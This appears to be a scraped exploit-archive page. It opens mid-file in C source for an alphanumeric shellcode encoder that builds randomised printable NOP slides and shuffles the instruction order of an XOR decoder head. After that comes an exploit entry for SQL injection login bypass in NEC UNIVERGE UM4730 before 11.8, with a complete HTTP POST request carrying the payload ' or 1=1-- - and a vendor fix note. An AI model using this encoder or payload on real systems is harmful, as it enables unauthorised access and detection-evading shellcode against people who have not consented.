//inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  24. exploit : # Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection # Vulnerbility: SQL injection login bypass # Date: 15-12-2016 # Exploit Author: b0x41s # Author web: https://www.xrayit.nl # Vendor Homepage: https://www.nec-enterprise.com # Category: webapps # Version: 11.6.0.31 # Tested on: Windows server 2008 Description: The auth_user parameter is vulnerable to SQL injection. The login can be bypassed. POC: POST /admin/index.php HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://127.0.0.1/admin/index.php Content-Type: application/x-www-form-urlencoded Content-Lenght: 105 Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de Fix answer from vendor: The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.
×
×
  • جدید...